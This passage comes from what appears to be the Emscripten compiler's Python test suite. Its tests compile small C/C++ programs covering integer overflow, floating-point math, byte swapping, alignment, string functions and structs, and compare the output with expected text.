for(uint i = 1; i < N; i++) // if we do not do this precisely, at least we should coerce to int immediately, not wait
state[i] = seed = 1812433253U * (seed ^ (seed >> 30)) + i;
next = 0;
}
int main() {
seedMT(5497);
for (int i = 0; i < 10; i++) printf("%d: %u\n", i, state[i]);
return 0;
}
'''
self.do_run(src, '''0: 5497
1: 2916432318
2: 2502517762
3: 3151524867
4: 2323729668
5: 2053478917
6: 2409490438
7: 848473607
8: 691103752
9: 3915535113
''')
def test_i16_emcc_intrinsic(self):
Settings.CORRECT_SIGNS = 1 # Relevant to this test
src = r'''
#include <stdio.h>
int test(unsigned short a, unsigned short b) {
unsigned short result = a;
result += b;
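          // if the 16-bit addition wrapped around, result == (a+b) mod 65536, which is less than b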
if (result < b) printf("C!");
return result;
}
int main(void) {
printf(",%d,", test(0, 0));
printf(",%d,", test(1, 1));
printf(",%d,", test(65535, 1));
printf(",%d,", test(1, 65535));
printf(",%d,", test(32768, 32767));
printf(",%d,", test(32768, 32768));
return 0;
}
'''
self.do_run(src, ',0,,2,C!,0,C!,0,,65535,C!,0,')
def test_negative_zero(self):
src = r'''
#include <stdio.h>
#include <math.h>
int main() {
#define TEST(x, y) \
printf("%.2f, %.2f ==> %.2f\n", x, y, copysign(x, y));
TEST( 5.0f, 5.0f);
TEST( 5.0f, -5.0f);
TEST(-5.0f, 5.0f);
TEST(-5.0f, -5.0f);
TEST( 5.0f, 4.0f);
TEST( 5.0f, -4.0f);
TEST(-5.0f, 4.0f);
TEST(-5.0f, -4.0f);
TEST( 0.0f, 5.0f);
TEST( 0.0f, -5.0f);
TEST(-0.0f, 5.0f);
TEST(-0.0f, -5.0f);
TEST( 5.0f, 0.0f);
TEST( 5.0f, -0.0f);
TEST(-5.0f, 0.0f);
TEST(-5.0f, -0.0f);
TEST( 0.0f, 0.0f);
TEST( 0.0f, -0.0f);
TEST(-0.0f, 0.0f);
TEST(-0.0f, -0.0f);
return 0;
}
'''
self.do_run(src, '''5.00, 5.00 ==> 5.00
5.00, -5.00 ==> -5.00
-5.00, 5.00 ==> 5.00
-5.00, -5.00 ==> -5.00
5.00, 4.00 ==> 5.00
5.00, -4.00 ==> -5.00
-5.00, 4.00 ==> 5.00
-5.00, -4.00 ==> -5.00
0.00, 5.00 ==> 0.00
0.00, -5.00 ==> -0.00
-0.00, 5.00 ==> 0.00
-0.00, -5.00 ==> -0.00
5.00, 0.00 ==> 5.00
5.00, -0.00 ==> -5.00
-5.00, 0.00 ==> 5.00
-5.00, -0.00 ==> -5.00
0.00, 0.00 ==> 0.00
0.00, -0.00 ==> -0.00
-0.00, 0.00 ==> 0.00
-0.00, -0.00 ==> -0.00
''')
def test_llvm_intrinsics(self):
if self.emcc_args == None: return self.skip('needs ta2')
Settings.PRECISE_I64_MATH = 2 # for bswap64
src = r'''
#include <stdio.h>
#include <sys/types.h>
extern "C" {
extern unsigned short llvm_bswap_i16(unsigned short x);
extern unsigned int llvm_bswap_i32(unsigned int x);
extern int32_t llvm_ctlz_i32(int32_t x);
extern int64_t llvm_ctlz_i64(int64_t x);
extern int32_t llvm_cttz_i32(int32_t x);
extern int64_t llvm_cttz_i64(int64_t x);
extern int32_t llvm_ctpop_i32(int32_t x);
extern int64_t llvm_ctpop_i64(int64_t x);
extern int llvm_expect_i32(int x, int y);
}
int main(void) {
unsigned short x = 0xc8ef;
printf("%x,%x\n", x&0xff, x >> 8);
x = llvm_bswap_i16(x);
printf("%x,%x\n", x&0xff, x >> 8);
unsigned int y = 0xc5de158a;
printf("%x,%x,%x,%x\n", y&0xff, (y>>8)&0xff, (y>>16)&0xff, (y>>24)&0xff);
y = llvm_bswap_i32(y);
printf("%x,%x,%x,%x\n", y&0xff, (y>>8)&0xff, (y>>16)&0xff, (y>>24)&0xff);
printf("%d,%d\n", (int)llvm_ctlz_i64(((int64_t)1) << 40), llvm_ctlz_i32(1<<10));
printf("%d,%d\n", (int)llvm_cttz_i64(((int64_t)1) << 40), llvm_cttz_i32(1<<10));
printf("%d,%d\n", (int)llvm_ctpop_i64((0x3101ULL << 32) | 1), llvm_ctpop_i32(0x3101));
printf("%d\n", (int)llvm_ctpop_i32(-594093059));
printf("%d\n", llvm_expect_i32(x % 27, 3));
int64_t a = 1;
a = __builtin_bswap64(a);
printf("%lld\n", a);
return 0;
}
'''
self.do_run(src, '''ef,c8
c8,ef
8a,15,de,c5
c5,de,15,8a
23,21
40,10
5,4
22
13
72057594037927936
''')
def test_bswap64(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('needs ta2')
src = r'''
#include <stdio.h>
#include <stdlib.h>
#include <iostream>
#include <string>
#include <sstream>
typedef unsigned long long quint64;
using namespace std;
inline quint64 qbswap(quint64 source)
{
return 0
| ((source & quint64(0x00000000000000ffLL)) << 56)
| ((source & quint64(0x000000000000ff00LL)) << 40)
| ((source & quint64(0x0000000000ff0000LL)) << 24)
| ((source & quint64(0x00000000ff000000LL)) << 8)
| ((source & quint64(0x000000ff00000000LL)) >> 8)
| ((source & quint64(0x0000ff0000000000LL)) >> 24)
| ((source & quint64(0x00ff000000000000LL)) >> 40)
| ((source & quint64(0xff00000000000000LL)) >> 56);
}
int main()
{
quint64 v = strtoull("4433ffeeddccbb00", NULL, 16);
printf("%lld\n", v);
const string string64bitInt = "4433ffeeddccbb00";
stringstream s(string64bitInt);
quint64 int64bitInt = 0;
printf("1\n");
s >> hex >> int64bitInt;
printf("2\n");
stringstream out;
out << hex << qbswap(int64bitInt);
cout << out.str() << endl;
cout << hex << int64bitInt << endl;
cout << string64bitInt << endl;
if (out.str() != "bbccddeeff3344")
{
cout << "Failed!" << endl;
}
else
{
cout << "Succeeded!" << endl;
}
return 0;
}
'''
self.do_run(src, '''4914553019779824384
1
2
bbccddeeff3344
4433ffeeddccbb00
4433ffeeddccbb00
Succeeded!
''')
def test_sha1(self):
if self.emcc_args == None: return self.skip('needs ta2')
self.do_run(open(path_from_root('tests', 'sha1.c')).read(), 'SHA1=15dd99a1991e0b3826fede3deffc1feba42278e6')
def test_cube2md5(self):
if self.emcc_args == None: return self.skip('needs emcc')
self.emcc_args += ['--embed-file', 'cube2md5.txt']
shutil.copyfile(path_from_root('tests', 'cube2md5.txt'), os.path.join(self.get_dir(), 'cube2md5.txt'))
self.do_run(open(path_from_root('tests', 'cube2md5.cpp')).read(), open(path_from_root('tests', 'cube2md5.ok')).read())
def test_cube2hash(self):
try:
old_chunk_size = os.environ.get('EMSCRIPT_MAX_CHUNK_SIZE') or ''
os.environ['EMSCRIPT_MAX_CHUNK_SIZE'] = '1' # test splitting out each function to a chunk in emscripten.py (21 functions here)
# A good test of i64 math
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('requires ta2 C-style memory aliasing')
self.do_run('', 'Usage: hashstring <seed>',
libraries=self.get_library('cube2hash', ['cube2hash.bc'], configure=None),
includes=[path_from_root('tests', 'cube2hash')])
for text, output in [('fleefl', '892BDB6FD3F62E863D63DA55851700FDE3ACF30204798CE9'),
('fleefl2', 'AA2CC5F96FC9D540CA24FDAF1F71E2942753DB83E8A81B61'),
('64bitisslow', '64D8470573635EC354FEE7B7F87C566FCAF1EFB491041670')]:
self.do_run('', 'hash value: ' + output, [text], no_build=True)
finally:
os.environ['EMSCRIPT_MAX_CHUNK_SIZE'] = old_chunk_size
def test_unaligned(self):
if Settings.QUANTUM_SIZE == 1: return self.skip('No meaning to unaligned addresses in q1')
src = r'''
#include<stdio.h>
struct S {
double x;
int y;
};
int main() {
// the 64-bit value here will not be 8-byte aligned
S s0[3] = { {0x12a751f430142, 22}, {0x17a5c85bad144, 98}, {1, 1}};
char buffer[10*sizeof(S)];
int b = int(buffer);
S *s = (S*)(b + 4-b%8);
s[0] = s0[0];
s[1] = s0[1];
s[2] = s0[2];
printf("*%d : %d : %d\n", sizeof(S), ((unsigned int)&s[0]) % 8 != ((unsigned int)&s[1]) % 8,
((unsigned int)&s[1]) - ((unsigned int)&s[0]));
s[0].x++;
s[0].y++;
s[1].x++;
s[1].y++;
printf("%.1f,%d,%.1f,%d\n", s[0].x, s[0].y, s[1].x, s[1].y);
return 0;
}
'''
# TODO: A version of this with int64s as well
if self.is_le32():
return self.skip('LLVM marks the reads of s as fully aligned, making this test invalid')
else:
self.do_run(src, '*12 : 1 : 12\n328157500735811.0,23,416012775903557.0,99\n')
return # TODO: continue to the next part here
# Test for undefined behavior in C. This is not legitimate code, but does exist
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('No meaning to unaligned addresses without t2')
src = r'''
#include <stdio.h>
int main()
{
int x[10];
char *p = (char*)&x[0];
p++;
short *q = (short*)p;
*q = 300;
printf("*%d:%d*\n", *q, ((int)q)%2);
int *r = (int*)p;
*r = 515559;
printf("*%d*\n", *r);
long long *t = (long long*)p;
*t = 42949672960;
printf("*%Ld*\n", *t);
return 0;
}
'''
try:
self.do_run(src, '*300:1*\n*515559*\n*42949672960*\n')
except Exception, e:
assert 'must be aligned' in str(e), e # expected to fail without emulation
def test_align64(self):
src = r'''
#include <stdio.h>
// inspired by poppler
enum Type {
A = 10,
B = 20
};
struct Object {
Type type;
union {
int intg;
double real;
char *name;
};
};
struct Principal {
double x;
Object a;
double y;
};
int main(int argc, char **argv)
{
int base = argc-1;
Object *o = NULL;
printf("%d,%d\n", sizeof(Object), sizeof(Principal));
printf("%d,%d,%d,%d\n", (int)&o[base].type, (int)&o[base].intg, (int)&o[base].real, (int)&o[base].name);
printf("%d,%d,%d,%d\n", (int)&o[base+1].type, (int)&o[base+1].intg, (int)&o[base+1].real, (int)&o[base+1].name);
Principal p, q;
p.x = p.y = q.x = q.y = 0;
p.a.type = A;
p.a.real = 123.456;
*(&q.a) = p.a;
printf("%.2f,%d,%.2f,%.2f : %.2f,%d,%.2f,%.2f\n", p.x, p.a.type, p.a.real, p.y, q.x, q.a.type, q.a.real, q.y);
return 0;
}
'''
if self.is_le32():
self.do_run(src, '''16,32
0,8,8,8
16,24,24,24
0.00,10,123.46,0.00 : 0.00,10,123.46,0.00
''')
else:
self.do_run(src, '''12,28
0,4,4,4
12,16,16,16
0.00,10,123.46,0.00 : 0.00,10,123.46,0.00
''')
def test_unsigned(self):
Settings.CORRECT_SIGNS = 1 # We test for exactly this sort of thing here
Settings.CHECK_SIGNS = 0
src = '''
#include <stdio.h>
        const signed char cvals[2] = { -1, -2 }; // compiler can store this as a string, so -1 becomes \FF, and needs re-signing
int main()
{
{
unsigned char x = 200;
printf("*%d*\\n", x);
unsigned char y = -22;
printf("*%d*\\n", y);
}
int varey = 100;
unsigned int MAXEY = -1, MAXEY2 = -77;
printf("*%u,%d,%u*\\n", MAXEY, varey >= MAXEY, MAXEY2); // 100 >= -1? not in unsigned!
int y = cvals[0];
printf("*%d,%d,%d,%d*\\n", cvals[0], cvals[0] < 0, y, y < 0);
y = cvals[1];
printf("*%d,%d,%d,%d*\\n", cvals[1], cvals[1] < 0, y, y < 0);
// zext issue - see mathop in jsifier
unsigned char x8 = -10;
unsigned long hold = 0;
hold += x8;
int y32 = hold+50;
printf("*%u,%u*\\n", hold, y32);
// Comparisons
x8 = 0;
for (int i = 0; i < 254; i++) x8++; // make it an actual 254 in JS - not a -2
printf("*%d,%d*\\n", x8+1 == 0xff, x8+1 != 0xff); // 0xff may be '-1' in the bitcode
return 0;
}
'''
self.do_run(src, '*4294967295,0,4294967219*\n*-1,1,-1,1*\n*-2,1,-2,1*\n*246,296*\n*1,0*')
# Now let's see some code that should just work in USE_TYPED_ARRAYS == 2, but requires
# corrections otherwise
if Settings.USE_TYPED_ARRAYS == 2:
Settings.CORRECT_SIGNS = 0
Settings.CHECK_SIGNS = 1 if not Settings.ASM_JS else 0
else:
Settings.CORRECT_SIGNS = 1
Settings.CHECK_SIGNS = 0
src = '''
#include <stdio.h>
int main()
{
{
unsigned char x;
unsigned char *y = &x;
*y = -1;
printf("*%d*\\n", x);
}
{
unsigned short x;
unsigned short *y = &x;
*y = -1;
printf("*%d*\\n", x);
}
/*{ // This case is not checked. The hint for unsignedness is just the %u in printf, and we do not analyze that
unsigned int x;
unsigned int *y = &x;
*y = -1;
printf("*%u*\\n", x);
}*/
{
char x;
char *y = &x;
*y = 255;
printf("*%d*\\n", x);
}
{
char x;
char *y = &x;
*y = 65535;
printf("*%d*\\n", x);
}
{
char x;
char *y = &x;
*y = 0xffffffff;
printf("*%d*\\n", x);
}
return 0;
}
'''
self.do_run(src, '*255*\n*65535*\n*-1*\n*-1*\n*-1*')
def test_bitfields(self):
if self.emcc_args is None: Settings.SAFE_HEAP = 0 # bitfields do loads on invalid areas, by design
src = '''
#include <stdio.h>
struct bitty {
unsigned x : 1;
unsigned y : 1;
unsigned z : 1;
};
int main()
{
bitty b;
printf("*");
for (int i = 0; i <= 1; i++)
for (int j = 0; j <= 1; j++)
for (int k = 0; k <= 1; k++) {
b.x = i;
b.y = j;
b.z = k;
printf("%d,%d,%d,", b.x, b.y, b.z);
}
printf("*\\n");
return 0;
}
'''
self.do_run(src, '*0,0,0,0,0,1,0,1,0,0,1,1,1,0,0,1,0,1,1,1,0,1,1,1,*')
def test_floatvars(self):
src = '''
#include <stdio.h>
// headers test, see issue #1013
#include<cfloat>
#include<cmath>
int main(int argc, char **argv)
{
float x = 1.234, y = 3.5, q = 0.00000001;
y *= 3;
int z = x < y;
printf("*%d,%d,%.1f,%d,%.4f,%.2f*\\n", z, int(y), y, (int)x, x, q);
printf("%.2f, %.2f, %.2f, %.2f\\n", fmin(0.5, 3.3), fmin(NAN, 3.3), fmax(0.5, 3.3), fmax(NAN, 3.3));
printf("small: %.10f\\n", argc * 0.000001);
/*
// Rounding behavior
float fs[6] = { -2.75, -2.50, -2.25, 2.25, 2.50, 2.75 };
double ds[6] = { -2.75, -2.50, -2.25, 2.25, 2.50, 2.75 };
for (int i = 0; i < 6; i++)
printf("*int(%.2f)=%d,%d*\\n", fs[i], int(fs[i]), int(ds[i]));
*/
return 0;
}
'''
self.do_run(src, '*1,10,10.5,1,1.2340,0.00*\n0.50, 3.30, 3.30, 3.30\nsmall: 0.0000010000\n')
def test_isnan(self):
src = r'''
#include <stdio.h>
int IsNaN(double x){
int rc; /* The value return */
volatile double y = x;
volatile double z = y;
rc = (y!=z);
return rc;
}
int main() {
double tests[] = { 1.0, 3.333, 1.0/0.0, 0.0/0.0, -1.0/0.0, -0, 0, -123123123, 12.0E200 };
for (int i = 0; i < sizeof(tests)/sizeof(double); i++)
printf("%d - %f - %d\n", i, tests[i], IsNaN(tests[i]));
}
'''
self.do_run(src, '''0 - 1.000000 - 0
1 - 3.333000 - 0
2 - inf - 0
3 - nan - 1
4 - -inf - 0
5 - 0.000000 - 0
6 - 0.000000 - 0
7 - -123123123.000000 - 0
8 - 1.2e+201 - 0
''')
def test_globaldoubles(self):
src = r'''
#include <stdlib.h>
#include <stdio.h>
double testVu, testVv, testWu, testWv;
void Test(double _testVu, double _testVv, double _testWu, double _testWv)
{
testVu = _testVu;
testVv = _testVv;
testWu = _testWu;
testWv = _testWv;
printf("BUG?\n");
printf("Display: Vu=%f Vv=%f Wu=%f Wv=%f\n", testVu, testVv, testWu, testWv);
}
int main(void)
{
double v1 = 465.1;
double v2 = 465.2;
double v3 = 160.3;
double v4 = 111.4;
Test(v1, v2, v3, v4);
return 0;
}
'''
self.do_run(src, 'BUG?\nDisplay: Vu=465.100000 Vv=465.200000 Wu=160.300000 Wv=111.400000')
def test_math(self):
src = '''
#include <stdio.h>
#include <stdlib.h>
#include <cmath>
int main()
{
printf("*%.2f,%.2f,%d", M_PI, -M_PI, (1/0.0) > 1e300); // could end up as infinity, or just a very very big number
printf(",%d", isfinite(NAN) != 0);
printf(",%d", isfinite(INFINITY) != 0);
printf(",%d", isfinite(-INFINITY) != 0);
printf(",%d", isfinite(12.3) != 0);
printf(",%d", isinf(NAN) != 0);
printf(",%d", isinf(INFINITY) != 0);
printf(",%d", isinf(-INFINITY) != 0);
printf(",%d", isinf(12.3) != 0);
div_t div_result = div(23, 10);
printf(",%d", div_result.quot);
printf(",%d", div_result.rem);
double sine = -1.0, cosine = -1.0;
sincos(0.0, &sine, &cosine);
printf(",%1.1lf", sine);
printf(",%1.1lf", cosine);
float fsine = -1.0f, fcosine = -1.0f;
sincosf(0.0, &fsine, &fcosine);
printf(",%1.1f", fsine);
printf(",%1.1f", fcosine);
printf("*\\n");
return 0;
}
'''
self.do_run(src, '*3.14,-3.14,1,0,0,0,1,0,1,1,0,2,3,0.0,1.0,0.0,1.0*')
def test_erf(self):
src = '''
#include <math.h>
#include <stdio.h>
int main()
{
printf("%1.6f, %1.6f, %1.6f, %1.6f, %1.6f, %1.6f\\n",
erf(1.0),
erf(3.0),
erf(-1.0),
erfc(1.0),
erfc(3.0),
erfc(-1.5));
return 0;
}
'''
self.do_run(src, '0.842701, 0.999978, -0.842701, 0.157299, 0.000022, 1.966105')
def test_math_hyperbolic(self):
src = open(path_from_root('tests', 'hyperbolic', 'src.c'), 'r').read()
expected = open(path_from_root('tests', 'hyperbolic', 'output.txt'), 'r').read()
self.do_run(src, expected)
def test_frexp(self):
src = '''
#include <stdio.h>
#include <math.h>
#include <assert.h>
static const double tol=1e-16;
void test_value(double value)
{
int exponent;
double x=frexp(value, &exponent);
double expected=x*pow(2.0, exponent);
printf("%f=%f*2^%d\\n", value, x, exponent);
assert(fabs(expected-value)<tol);
assert(x==0 || (fabs(x)>=5e-1 && fabs(x)<1)); // x has a magnitude in the interval [1/2, 1)
}
int main()
{
test_value(0);
test_value(100.1);
test_value(-100.1);
test_value(.5);
test_value(-.5);
test_value(1-1e-16);
test_value(-(1-1e-16));
return 0;
}
'''
self.do_run(src, '''0.000000=0.000000*2^0
100.100000=0.782031*2^7
-100.100000=-0.782031*2^7
0.500000=0.500000*2^0
-0.500000=-0.500000*2^0
1.000000=1.000000*2^0
-1.000000=-1.000000*2^0''')
def test_rounding(self):
src = '''
#include <stdio.h>
#include <math.h>
int main()
{
printf("%.1f ", round(1.4));
printf("%.1f ", round(1.6));
printf("%.1f ", round(-1.4));
printf("%.1f ", round(-1.6));
printf("%.1f ", round(1.5));
printf("%.1f ", round(2.5));
printf("%.1f ", round(-1.5));
printf("%.1f ", round(-2.5));
printf("%ld ", lrint(1.4));
printf("%ld ", lrint(1.6));
printf("%ld ", lrint(-1.4));
printf("%ld ", lrint(-1.6));
printf("%ld ", lrint(1.5));
printf("%ld ", lrint(2.5));
printf("%ld ", lrint(-1.5));
printf("%ld ", lrint(-2.5));
return 0;
}
'''
self.do_run(src, "1.0 2.0 -1.0 -2.0 2.0 3.0 -2.0 -3.0 "
"1 2 -1 -2 2 2 -2 -2")
def test_llrint(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('requires ta2')
src = r'''
#include <stdio.h>
#include <math.h>
int main() {
printf("%lld\n%lld\n%lld\n%lld\n", llrint(0.1), llrint(0.6), llrint(1.25), llrint(1099511627776.667));
return 0;
}
'''
self.do_run(src, '0\n1\n1\n1099511627777\n')
def test_getgep(self):
# Generated code includes getelementptr (getelementptr, 0, 1), i.e., GEP as the first param to GEP
src = '''
#include <stdio.h>
struct {
int y[10];
int z[10];
} commonblock;
int main()
{
for (int i = 0; i < 10; ++i) {
commonblock.y[i] = 1;
commonblock.z[i] = 2;
}
printf("*%d %d*\\n", commonblock.y[0], commonblock.z[0]);
return 0;
}
'''
self.do_run(src, '*1 2*')
def test_multiply_defined_symbols(self):
a1 = "int f() { return 1; }"
a1_name = os.path.join(self.get_dir(), 'a1.c')
open(a1_name, 'w').write(a1)
a2 = "void x() {}"
a2_name = os.path.join(self.get_dir(), 'a2.c')
open(a2_name, 'w').write(a2)
b1 = "int f() { return 2; }"
b1_name = os.path.join(self.get_dir(), 'b1.c')
open(b1_name, 'w').write(b1)
b2 = "void y() {}"
b2_name = os.path.join(self.get_dir(), 'b2.c')
open(b2_name, 'w').write(b2)
main = r'''
#include <stdio.h>
int f();
int main() {
printf("result: %d\n", f());
return 0;
}
'''
main_name = os.path.join(self.get_dir(), 'main.c')
open(main_name, 'w').write(main)
Building.emcc(a1_name)
Building.emcc(a2_name)
Building.emcc(b1_name)
Building.emcc(b2_name)
Building.emcc(main_name)
liba_name = os.path.join(self.get_dir(), 'liba.a')
Building.emar('cr', liba_name, [a1_name + '.o', a2_name + '.o'])
libb_name = os.path.join(self.get_dir(), 'libb.a')
Building.emar('cr', libb_name, [b1_name + '.o', b2_name + '.o'])
all_name = os.path.join(self.get_dir(), 'all.bc')
Building.link([main_name + '.o', liba_name, libb_name], all_name)
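    # liba is passed to the linker before libb, so a1's f() (returning 1) should be the definition that wins, matching 'result: 1'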
self.do_ll_run(all_name, 'result: 1')
def test_if(self):
src = '''
#include <stdio.h>
int main()
{
int x = 5;
if (x > 3) {
printf("*yes*\\n");
}
return 0;
}
'''
self.do_run(src, '*yes*')
def test_if_else(self):
src = '''
#include <stdio.h>
int main()
{
int x = 5;
if (x > 10) {
printf("*yes*\\n");
} else {
printf("*no*\\n");
}
return 0;
}
'''
self.do_run(src, '*no*')
def test_loop(self):
src = '''
#include <stdio.h>
int main()
{
int x = 5;
for (int i = 0; i < 6; i++) {
x += x*i;
if (x > 1000) {
if (x % 7 == 0) printf("cheez\\n");
x /= 2;
break;
}
}
printf("*%d*\\n", x);
return 0;
}
'''
self.do_run(src, '*1800*')
generated = open('src.cpp.o.js', 'r').read()
def test_stack(self):
Settings.INLINING_LIMIT = 50
src = '''
#include <stdio.h>
int test(int i) {
int x = 10;
if (i > 0) {
return test(i-1);
}
return int(&x); // both for the number, and forces x to not be nativized
}
int main(int argc, char **argv)
{
// We should get the same value for the first and last - stack has unwound
int x1 = test(argc - 2);
int x2 = test(100);
int x3 = test((argc - 2) / 4);
printf("*%d,%d*\\n", x3-x1, x2 != x1);
return 0;
}
'''
self.do_run(src, '*0,1*')
def test_strings(self):
src = '''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv)
{
int x = 5, y = 9, magic = 7; // fool compiler with magic
memmove(&x, &y, magic-7); // 0 should not crash us
int xx, yy, zz;
char s[32];
int cc = sscanf("abc_10.b1_xyz_543_defg", "abc_%d.%2x_xyz_%3d_%3s", &xx, &yy, &zz, s);
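          // four conversions: 10, "b1" parsed as hex by %2x (177), 543 via %3d, and "def" via %3s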
printf("%d:%d,%d,%d,%s\\n", cc, xx, yy, zz, s);
printf("%d\\n", argc);
puts(argv[1]);
puts(argv[2]);
printf("%d\\n", atoi(argv[3])+2);
const char *foolingthecompiler = "\\rabcd";
printf("%d\\n", strlen(foolingthecompiler)); // Tests parsing /0D in llvm - should not be a 0 (end string) then a D!
printf("%s\\n", NULL); // Should print '(null)', not the string at address 0, which is a real address for us!
printf("/* a comment */\\n"); // Should not break the generated code!
printf("// another\\n"); // Should not break the generated code!
char* strdup_val = strdup("test");
printf("%s\\n", strdup_val);
free(strdup_val);
{
char *one = "one 1 ONE !";
char *two = "two 2 TWO ?";
char three[1024];
memset(three, '.', 1024);
three[50] = 0;
strncpy(three + argc, one + (argc/2), argc+1);
strncpy(three + argc*3, two + (argc/3), argc+2);
printf("waka %s\\n", three);
}
{
char *one = "string number one top notch";
char *two = "fa la sa ho fi FI FO FUM WHEN WHERE WHY HOW WHO";
char three[1000];
strcpy(three, &one[argc*2]);
char *four = strcat(three, &two[argc*3]);
printf("cat |%s|\\n", three);
printf("returned |%s|\\n", four);
}
return 0;
}
'''
for named in (0, 1):
print named
Settings.NAMED_GLOBALS = named
self.do_run(src, '''4:10,177,543,def\n4\nwowie\ntoo\n76\n5\n(null)\n/* a comment */\n// another\ntest\nwaka ....e 1 O...wo 2 T................................
cat |umber one top notchfi FI FO FUM WHEN WHERE WHY HOW WHO|
returned |umber one top notchfi FI FO FUM WHEN WHERE WHY HOW WHO|''', ['wowie', 'too', '74'])
if self.emcc_args == []:
gen = open(self.in_dir('src.cpp.o.js')).read()
assert ('var __str1;' in gen) == named
def test_strcmp_uni(self):
src = '''
#include <stdio.h>
#include <string.h>
int main()
{
#define TEST(func) \
{ \
char *word = "WORD"; \
char wordEntry[2] = { -61,-126 }; /* "Â"; */ \
int cmp = func(word, wordEntry, 2); \
printf("Compare value " #func " is %d\\n", cmp); \
}
TEST(strncmp);
TEST(strncasecmp);
TEST(memcmp);
}
'''
self.do_run(src, 'Compare value strncmp is -1\nCompare value strncasecmp is -1\nCompare value memcmp is -1\n')
def test_strndup(self):
src = '''
//---------------
//- http://pubs.opengroup.org/onlinepubs/9699919799/functions/strndup.html
//---------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv) {
const char* source = "strndup - duplicate a specific number of bytes from a string";
char* strdup_val = strndup(source, 0);
printf("1:%s\\n", strdup_val);
free(strdup_val);
strdup_val = strndup(source, 7);
printf("2:%s\\n", strdup_val);
free(strdup_val);
strdup_val = strndup(source, 1000);
printf("3:%s\\n", strdup_val);
free(strdup_val);
strdup_val = strndup(source, 60);
printf("4:%s\\n", strdup_val);
free(strdup_val);
strdup_val = strndup(source, 19);
printf("5:%s\\n", strdup_val);
free(strdup_val);
strdup_val = strndup(source, -1);
printf("6:%s\\n", strdup_val);
free(strdup_val);
return 0;
}
'''
self.do_run(src, '1:\n2:strndup\n3:strndup - duplicate a specific number of bytes from a string\n4:strndup - duplicate a specific number of bytes from a string\n5:strndup - duplicate\n6:\n')
def test_errar(self):
src = r'''
#include <stdio.h>
#include <errno.h>
#include <string.h>
int main() {
char* err;
char buffer[200];
err = strerror(EDOM);
strerror_r(EWOULDBLOCK, buffer, 200);
printf("<%s>\n", err);
printf("<%s>\n", buffer);
printf("<%d>\n", strerror_r(EWOULDBLOCK, buffer, 0));
errno = 123;
printf("<%d>\n", errno);
return 0;
}
'''
expected = '''
<Math arg out of domain of func>
<No more processes>
<34>
<123>
'''
self.do_run(src, re.sub('(^|\n)\s+', '\\1', expected))
def test_mainenv(self):
src = '''
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
printf("*%p*\\n", envp);
return 0;
}
'''
self.do_run(src, '*(nil)*')
def test_funcs(self):
src = '''
#include <stdio.h>
int funcy(int x)
{
return x*9;
}
int main()
{
printf("*%d,%d*\\n", funcy(8), funcy(10));
return 0;
}
'''
self.do_run(src, '*72,90*')
def test_structs(self):
src = '''
#include <stdio.h>
struct S
{
int x, y;
};
int main()
{
S a, b;
a.x = 5; a.y = 6;
b.x = 101; b.y = 7009;
S *c, *d;
c = &a;
c->x *= 2;
c = &b;
c->y -= 1;
d = c;
d->y += 10;
printf("*%d,%d,%d,%d,%d,%d,%d,%d*\\n", a.x, a.y, b.x, b.y, c->x, c->y, d->x, d->y);
return 0;
}
'''
self.do_run(src, '*10,6,101,7018,101,7018,101,7018*')
gen_struct_src = '''
#include <stdio.h>
#include <stdlib.h>
#include "emscripten.h"
struct S
{
int x, y;
};
int main()
{
S* a = {{gen_struct}};
a->x = 51; a->y = 62;
printf("*%d,%d*\\n", a->x, a->y);
{{del_struct}}(a);
return 0;
}
'''
def test_mallocstruct(self):
self.do_run(self.gen_struct_src.replace('{{gen_struct}}', '(S*)malloc(sizeof(S))').replace('{{del_struct}}', 'free'), '*51,62*')
def test_newstruct(self):
if self.emcc_args is None: return self.skip('requires emcc')
self.do_run(self.gen_struct_src.replace('{{gen_struct}}', 'new S').replace('{{del_struct}}', 'delete'), '*51,62*')
def test_addr_of_stacked(self):
src = '''
#include <stdio.h>
void alter(int *y)
{
*y += 5;
}
int main()
{
int x = 2;
alter(&x);
printf("*%d*\\n", x);
return 0;
}
'''
self.do_run(src, '*7*')
def test_globals(self):
src = '''
#include <stdio.h>
char cache[256], *next = cache;
int main()
{
cache[10] = 25;
next[20] = 51;
printf("*%d,%d*\\n", next[10], cache[20]);
return 0;
}
'''
self.do_run(src, '*25,51*')
def test_linked_list(self):
src = '''
#include <stdio.h>
struct worker_args {
int value;
struct worker_args *next;
};
int main()
{
worker_args a;
worker_args b;
a.value = 60;
a.next = &b;
b.value = 900;
b.next = NULL;
worker_args* c = &a;
int total = 0;
while (c) {
total += c->value;
c = c->next;
}
// Chunk of em
worker_args chunk[10];
for (int i = 0; i < 9; i++) {
chunk[i].value = i*10;
chunk[i].next = &chunk[i+1];
}
chunk[9].value = 90;
chunk[9].next = &chunk[0];
c = chunk;
do {
total += c->value;
c = c->next;
} while (c != chunk);
printf("*%d,%d*\\n", total, b.next);
// NULL *is* 0, in C/C++. No JS null! (null == 0 is false, etc.)
return 0;
}
'''
self.do_run(src, '*1410,0*')
def test_sup(self):
src = '''
#include <stdio.h>
struct S4 { int x; }; // size: 4
struct S4_2 { short x, y; }; // size: 4, but for alignment purposes, 2
struct S6 { short x, y, z; }; // size: 6
struct S6w { char x[6]; }; // size: 6 also
struct S6z { int x; short y; }; // size: 8, since we align to a multiple of the biggest - 4
struct C___ { S6 a, b, c; int later; };
struct Carr { S6 a[3]; int later; }; // essentially the same, but differently defined
struct C__w { S6 a; S6w b; S6 c; int later; }; // same size, different struct
struct Cp1_ { int pre; short a; S6 b, c; int later; }; // fillers for a
struct Cp2_ { int a; short pre; S6 b, c; int later; }; // fillers for a (get addr of the other filler)
struct Cint { S6 a; int b; S6 c; int later; }; // An int (different size) for b
struct C4__ { S6 a; S4 b; S6 c; int later; }; // Same size as int from before, but a struct
struct C4_2 { S6 a; S4_2 b; S6 c; int later; }; // Same size as int from before, but a struct with max element size 2
struct C__z { S6 a; S6z b; S6 c; int later; }; // different size, 8 instead of 6
int main()
{
#define TEST(struc) \\
{ \\
struc *s = 0; \\
printf("*%s: %d,%d,%d,%d<%d*\\n", #struc, (int)&(s->a), (int)&(s->b), (int)&(s->c), (int)&(s->later), sizeof(struc)); \\
}
#define TEST_ARR(struc) \\
{ \\
struc *s = 0; \\
